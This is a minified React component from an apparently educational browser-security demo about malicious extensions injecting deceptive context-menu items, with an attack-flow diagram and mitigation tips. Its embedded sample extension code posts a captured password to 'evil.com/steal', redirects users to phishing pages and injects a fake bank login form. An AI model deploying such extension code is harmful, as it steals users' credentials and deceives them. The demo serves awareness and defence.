1import{r as e,ae as t,j as i}from"./jDfCxJ4A.js";import{A as s}from"./Dr_iguPY.js";import{A as a}from"./DsQQjLr8.js";import{A as n}from"./BHtydWM2.js";import"./DsaMfc1G.js";import"./ByuAo3pw.js";import"./D2IlnTbJ.js";import"./DUYR2dWT.js";import"./DbhlAc1j.js";import"./DcF50vGg.js";import"./CR1vSUBh.js";import"./NsHYjVlo.js";import"./CDyJKlnm.js";const r=({onComplete:r,onProgress:o,preferences:c})=>{const[d,l]=e.useState(0),[m,p]=e.useState(!1),h=e.useMemo(()=>[{id:"1",type:"action",position:{x:100,y:200},data:{label:"User Right-Clicks",description:"Opens context menu",actionType:"User Action",automated:!1,userTriggered:!0,state:"idle"}},{id:"2",type:"threat",position:{x:400,y:50},data:{label:"Malicious Extension",description:"contextMenus permission",threatLevel:"medium",state:"idle",impact:"UI manipulation and phishing",mitigation:"Verify menu item sources"}},{id:"3",type:"action",position:{x:400,y:200},data:{label:"Inject Menu Items",description:"Add malicious options",actionType:"UI Injection",automated:!0,userTriggered:!1,state:"idle"}},{id:"4",type:"vulnerable",position:{x:700,y:200},data:{label:"Context Menu UI",description:"Native browser menu",vulnerabilityType:"UI Trust",severity:"medium",exploitable:!0,state:"idle"}},{id:"5",type:"action",position:{x:1e3,y:200},data:{label:"User Clicks Item",description:"Trusts menu option",actionType:"User Interaction",automated:!1,userTriggered:!0,state:"idle"}},{id:"6",type:"threat",position:{x:1300,y:100},data:{label:"Execute Malicious Code",description:"Run attacker script",threatLevel:"high",state:"idle",impact:"Code execution in page context",mitigation:"Check extension permissions"}},{id:"7",type:"data",position:{x:1300,y:300},data:{label:"Page Data",description:"Forms, cookies, storage",dataType:"Sensitive Information",sensitive:!0,encrypted:!1,state:"idle"}}],[]),x=e.useMemo(()=>[{id:"e1-3",source:"1",target:"3",animated:!1,style:{stroke:"#4dbbbb",strokeWidth:2}},{id:"e2-3",source:"2",target:"3",animated:!1,label:"Injects",style:{stroke:"#ff4757",strokeWidth:2}},{id:"e3-4",source:"3",target:"4",animated:!1,style:{stroke:"#ff7f50",strokeWidth:2}},{id:"e4-5",source:"4",target:"5",animated:!1,label:"Displays",style:{stroke:"#ffd93d",strokeWidth:2}},{id:"e5-6",source:"5",target:"6",animated:!1,style:{stroke:"#ff4757",strokeWidth:2}},{id:"e5-7",source:"5",target:"7",animated:!1,style:{stroke:"#ff7f50",strokeWidth:2}}],[]),[u,g]=e.useState(h),[y,b]=e.useState(x),f=e.useCallback(()=>{const e=[()=>{g(e=>e.map(e=>"1"===e.id?{...e,data:{...e.data,state:"active"}}:e)),b(e=>e.map(e=>"e1-3"===e.id?{...e,animated:!0}:e))},()=>{g(e=>e.map(e=>"2"===e.id?{...e,data:{...e.data,state:"active"}}:e)),b(e=>e.map(e=>"e2-3"===e.id?{...e,animated:!0}:e))},()=>{g(e=>e.map(e=>"3"===e.id?{...e,data:{...e.data,state:"active"}}:e)),b(e=>e.map(e=>"e3-4"===e.id?{...e,animated:!0}:e))},()=>{g(e=>e.map(e=>"4"===e.id?{...e,data:{...e.data,state:"compromised"}}:e)),b(e=>e.map(e=>"e4-5"===e.id?{...e,animated:!0}:e))},()=>{g(e=>e.map(e=>"5"===e.id?{...e,data:{...e.data,state:"active"}}:e)),b(e=>e.map(e=>["e5-6","e5-7"].includes(e.id)?{...e,animated:!0}:e))},()=>{g(e=>e.map(e=>["6","7"].includes(e.id)?{...e,data:{...e.data,state:"7"===e.id?"compromised":"active"}}:e))}];d<e.length?(e[d](),l(e=>e+1),o((d+1)/e.length*100)):(p(!1),r())},[d,o,r]);return e.useCallback(()=>{p(!0),l(0),g(h),b(x)},[h,x]),t.useEffect(()=>{if(m&&c.autoProgress){const e=setTimeout(f,2e3);return()=>clearTimeout(e)}},[m,d,f,c.autoProgress]),i.jsxs("div",{className:"space-y-6",children:[i.jsxs(n.div,{initial:{opacity:0,y:20},animate:{opacity:1,y:0},className:"bg-seraphic-dark/50 rounded-lg p-6 border border-seraphic-teal/20",children:[i.jsx("h3",{className:"text-xl font-semibold text-seraphic-light mb-3",children:"Context Menu Injection"}),i.jsx("p",{className:"text-seraphic-light/80 mb-4",children:"This attack demonstrates how malicious extensions can inject deceptive items into browser context menus. Users trust these native UI elements, making them effective for phishing attacks, malicious redirects, or executing unwanted scripts when clicked."}),i.jsxs("div",{className:"grid grid-cols-1 md:grid-cols-3 gap-4 mt-4",children:[i.jsxs("div",{className:"bg-seraphic-dark/30 rounded p-3",children:[i.jsx("h4",{className:"text-sm font-semibold text-red-400 mb-1",children:"Attack Vector"}),i.jsx("p",{className:"text-xs text-seraphic-light/60",children:"contextMenus API"})]}),i.jsxs("div",{className:"bg-seraphic-dark/30 rounded p-3",children:[i.jsx("h4",{className:"text-sm font-semibold text-orange-400 mb-1",children:"Vulnerability"}),i.jsx("p",{className:"text-xs text-seraphic-light/60",children:"UI trust exploitation"})]}),i.jsxs("div",{className:"bg-seraphic-dark/30 rounded p-3",children:[i.jsx("h4",{className:"text-sm font-semibold text-green-400 mb-1",children:"Impact"}),i.jsx("p",{className:"text-xs text-seraphic-light/60",children:"Phishing, code execution"})]})]})]}),i.jsx(n.div,{initial:{opacity:0,scale:.95}
1,animate:{opacity:1,scale:1},transition:{delay:.2},children:i.jsx(s,{attackType:a.CONTEXT_MENU_INJECTION,nodes:u,edges:y,onNodesChange:g,onEdgesChange:b,interactive:!m})}),i.jsxs(n.div,{initial:{opacity:0,y:20},animate:{opacity:1,y:0},transition:{delay:.3},className:"bg-seraphic-dark/50 rounded-lg p-6 border border-seraphic-teal/20",children:[i.jsx("h4",{className:"text-sm font-semibold text-seraphic-light mb-4",children:"Context Menu Example"}),i.jsxs("div",{className:"relative bg-seraphic-dark/30 rounded-lg p-4",children:[i.jsx("div",{className:"bg-seraphic-dark/50 rounded shadow-lg w-48 p-1",children:i.jsxs("div",{className:"py-1",children:[i.jsx("div",{className:"px-3 py-2 text-xs text-seraphic-light/80 hover:bg-seraphic-teal/20 cursor-pointer",children:"Copy"}),i.jsx("div",{className:"px-3 py-2 text-xs text-seraphic-light/80 hover:bg-seraphic-teal/20 cursor-pointer",children:"Paste"}),i.jsx("div",{className:"border-t border-seraphic-light/10 my-1"}),i.jsxs(n.div,{initial:{opacity:0},animate:{opacity:m&&d>=3?1:0},className:"px-3 py-2 text-xs text-red-400 hover:bg-red-500/20 cursor-pointer flex items-center gap-2",children:[i.jsx("svg",{className:"w-3 h-3",fill:"none",viewBox:"0 0 24 24",stroke:"currentColor",children:i.jsx("path",{strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:2,d:"M12 9v2m0 4h.01m-6.938 4h13.856c1.54 0 2.502-1.667 1.732-3L13.732 4c-.77-1.333-2.694-1.333-3.464 0L3.34 16c-.77 1.333.192 3 1.732 3z"})}),"Quick Security Check"]}),i.jsx(n.div,{initial:{opacity:0}
1,animate:{opacity:m&&d>=3?1:0},className:"px-3 py-2 text-xs text-orange-400 hover:bg-orange-500/20 cursor-pointer",children:"Save Password"})]})}),m&&d>=3&&i.jsx("div",{className:"mt-2 text-xs text-seraphic-light/60",children:"Malicious items injected into trusted menu!"})]})]}),i.jsx(n.div,{initial:{opacity:0,y:20},animate:{opacity:1,y:0},transition:{delay:.4},className:"flex items-center justify-center bg-seraphic-dark/50 rounded-lg p-4 border border-seraphic-teal/20",children:i.jsx("div",{className:"text-sm text-seraphic-light/60",children:"Interactive attack flow visualization - Hover over nodes for details"})}),i.jsxs("div",{className:"grid grid-cols-1 md:grid-cols-2 gap-4",children:[i.jsxs(n.div,{initial:{opacity:0,y:20},animate:{opacity:1,y:0},transition:{delay:.5},className:"bg-seraphic-dark/50 rounded-lg p-4 border border-seraphic-teal/20",children:[i.jsx("h4",{className:"text-sm font-semibold text-seraphic-light mb-2",children:"Deceptive Menu Items"}),i.jsx("pre",{className:"text-xs text-seraphic-light/80 overflow-x-auto",children:i.jsx("code",{children:'// Create misleading context menu items\nchrome.contextMenus.create({\n id: "fake-security-check",\n title: "ð Quick Security Check",\n contexts: ["all"],\n onclick: (info, tab) => {\n // Redirect to phishing site\n chrome.tabs.update(tab.id, {\n url: \'https://phishing-site.com/fake-scan\'\n });\n }\n});\n\nchrome.contextMenus.create({\n id: "save-password",\n title: "Save Password to Vault",\n contexts: ["password"],\n onclick: (info, tab) => {\n // Steal password from input field\n chrome.tabs.executeScript(tab.id, {\n code: `\n const passwordField = document.activeElement;\n if (passwordField.type === \'password\') {\n fetch(\'https://evil.com/steal\', {\n method: \'POST\',\n body: JSON.stringify({\n password: passwordField.value,\n site: window.location.href\n })\n });\n }\n `\n });\n }\n});'})})]}),i.jsxs(n.div,{initial:{opacity:0,y:20},animate:{opacity:1,y:0},transition:{delay:.6},className:"bg-seraphic-dark/50 rounded-lg p-4 border border-seraphic-teal/20",children:[i.jsx("h4",{className:"text-sm font-semibold text-seraphic-light mb-2",children:"Dynamic Context Manipulation"}),i.jsx("pre",{className:"text-xs text-seraphic-light/80 overflow-x-auto",children:i.jsx("code",{children:'// Context-aware malicious items\nchrome.runtime.onInstalled.addListener(() => {\n // Banking site context\n chrome.contextMenus.create({\n id: "verify-account",\n title: "Verify Account Security",\n documentUrlPatterns: ["*://*.bank.com/*"],\n onclick: (info, tab) => {\n // Inject fake login form\n chrome.tabs.executeScript(tab.id, {\n file: \'inject-fake-form.js\'\n });\n }\n });\n\n // Shopping site context\n chrome.contextMenus.create({\n id: "apply-coupon",\n title: "Apply 50% OFF Coupon",\n documentUrlPatterns: ["*://*.amazon.com/*"],\n onclick: (info, tab) => {\n // Redirect through affiliate link\n const currentUrl = tab.url;\n const affiliateUrl = `https://tracking.com?ref=mal&url=${currentUrl}`;\n chrome.tabs.update(tab.id, { url: affiliateUrl });\n }\n });\n});'})})]})]}),i.jsxs(n.div,{initial:{opacity:0,y:20},animate:{opacity:1,y:0},transition:{delay:.7},className:"bg-green-500/10 rounded-lg p-4 border border-green-500/20",children:[i.jsx("h4",{className:"text-sm font-semibold text-green-400 mb-2",children:"Mitigation Strategies"}),i.jsxs("ul",{className:"text-xs text-seraphic-light/80 space-y-1",children:[i.jsx("li",{children:"⢠Be cautious of unexpected context menu items"}),i.jsx("li",{children:"⢠Verify the source of menu options before clicking"}),i.jsx("li",{children:"⢠Check extension permissions for contextMenus access"}),i.jsx("li",{children:"⢠Disable extensions on sensitive websites"}),i.jsx("li",{children:"⢠Look for official browser indicators on menu items"}),i.jsx("li",{children:"⢠Report suspicious context menu behavior"}),i.jsx("li",{children:"⢠Use extension allowlists for enterprise environments"})]})]})]})};export{r as default};
Line numbers count LF bytes from the start of the resource, as the search results do. Vendor segments are library code the classifier recognised; they are stored but not indexed. Bytes are shown as Latin1 characters, one per byte.